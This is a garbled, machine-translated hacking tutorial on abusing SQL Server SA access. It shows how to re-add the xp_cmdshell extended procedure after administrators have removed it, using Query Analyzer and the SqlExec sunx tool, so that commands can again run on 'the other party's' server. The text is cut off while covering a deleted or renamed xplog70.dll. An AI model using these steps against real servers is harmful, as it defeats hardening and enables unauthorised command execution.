SQL Server SA permissions Summary Classic Technology

Prerequisites Need Tools: SQL Query Analyzer and SqlExec sunx Version

The first part:

Analysis and summary of the protection system for removing xp_cmdshell:

First know the statement:

1. The way to remove the xp_cmdshell extension process is to use the following statement:

if exists (SELECT * from dbo.sysobjects where id=object_id (N ' [dbo].[ Xpcmdshell] ') and

OBJECTPROPERTY (id,n ' Isextendedproc ') =1) exec sp_dropextendedproc N ' [dbo]. [xp_cmdshell] '

2. The way to add the xp_cmdshell extension process is to use the following statement:

Sp_addextendedproc xp_cmdshell, @dllname = ' Xplog70.dll '

Now look at the phenomenon:

We get the SA permission remote with sqlexec execution cmd command, appear prompt sql_error, then very likely is to remove the xp_cmdshell.

Now look at two ways to recover after being removed from the xp_cmdshell:

Method one, use SQL Query Analyzer to connect each other directly after writing, very convenient sp_addextendedproc xp_cmdshell, @dllname = ' Xplog70.dll '

Method Two, use SqlExec sunx version first in SqlExec sunx version of the format option to fill in%s, in the CMD option to enter Sp_addextendedproc ' xp_cmdshell ', ' Xpsql70.dll ' or Sql2000 use sp_addextendedproc ' xp_cmdshell ', ' xplog70.dll ' In addition to SqlExec Sunx version to remove xp_ The Cmdshell method is the same as the addition of the time selection conditions, and then input sp_dropextendedproc ' xp_cmdshell ' can be

Part II:

If the other party has deleted or renamed Xplog70.dll, we will continue our hack task in the following ways:

When the appearance of the following phenomenon implies that the representative is likely to be xplog70.dll deleted or renamed.

Writing sp_addextendedproc xp_cmdshell in Query Analyzer, @dllname = ' Xplog70.dll ' indicates an object named ' xp_cmdshell ' already exists in the database.